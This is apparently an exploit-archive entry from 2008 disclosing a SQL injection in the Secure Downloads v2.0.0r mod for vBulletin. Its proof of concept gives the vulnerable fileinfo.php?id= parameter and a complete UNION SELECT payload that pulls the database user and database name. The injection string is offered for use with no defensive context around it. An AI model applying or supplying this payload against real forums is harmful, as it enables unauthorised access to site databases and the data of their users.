[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Secure Downloads v2.0.0r for vBulletin SQL Injection Vulnerability
# Published : 2008-12-08
# Author : Cnaph
# Previous Title : Simple Directory Listing 2 Cross Site File Upload Vulnerability
# Next Title : phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit


[~] vBulletin (Mode Secure Downloads v2.0.0r) SQL Injection Vulnerability

[~] Mod : http://www.1src.com/freeware/download.php?id=1880

[~] Author : Cn4phux

[~] PoC :

 

[~] URL.com/fileinfo.php?id=[SQL]


[~] : 1797'+AND(0)+UNION+SELECT+1,1,1,1,1,'Cn4phux',0,0,0,1,0,1,0,0,0,0,0,USER(),DATABASE(),0,0,0,0,0,0,0+OR+'1'='0


//Cn4phux.

# www.Syue.com [2008-12-08]